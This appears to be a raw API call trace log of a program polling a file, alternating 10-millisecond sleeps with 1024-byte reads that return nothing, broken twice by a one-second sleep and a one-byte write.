System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
File	Write	size = 1	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
File	Read	size = 1024, size_out = 0	1	Fn
System	Sleep	duration = 10 milliseconds (0.010 seconds)	1	Fn
